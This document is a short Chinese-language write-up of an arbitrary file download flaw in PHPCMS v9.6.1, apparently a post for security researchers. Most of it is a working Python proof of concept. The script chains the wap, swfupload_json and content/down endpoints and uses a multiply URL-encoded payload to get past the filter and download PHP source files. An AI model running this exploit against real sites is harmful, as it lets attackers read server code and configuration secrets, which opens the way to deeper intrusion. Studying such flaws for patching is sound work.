v9.6.1修复了9.6.0的注入和上传漏洞。
不过在修复的时候检验变量出现问题,该漏洞仅存在于v9.6.1漏洞的分析及修补方案在安全客
参数过滤 过程
swfupload_json -> safe_replace($_GET['src'])//f=p%3%252%270c -> down->init()
->safe_replace($a_k)//f=p%3%20C -> down->dawnload ->safe_replace($a_k) //f=p%3C
- 将9.6.0的payload改成s=./phpcms/modules/content/down.ph&f=p%3%25252%2*70C即可
#POC
#coding:utf-8
import requests
import re
url = 'http://192.168.42.133/phpcms/install_package/index.php'
s = requests.session()
params_get_userid = {
'm':'wap',
'c':'index',
'siteid':'1',
}
rep = s.get(url,params=params_get_userid)
for cookie in rep.cookies:
if '_siteid' in cookie.name:
userid = cookie.value #userid为第一次加密的$this->userid
payload = '%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C'
url_get_encode = '{}?m=attachment&c=attachments&a=swfupload_json&aid=1&src={}'.format(url,payload)
data = {'userid_flash':userid}
rep = s.post(url_get_encode,data=data)
for cookie in rep.cookies:
if '_att_json' in cookie.name:
encode_payload = cookie.value
params = {
'm':'content',
'c':'down',
'a_k':encode_payload,
}
rep = s.get(url,params=params)
content = rep.content#此时已经有下载链接了
file = re.findall(r'<a href="(.+?)"',content)[0]
print s.get(url+file).content
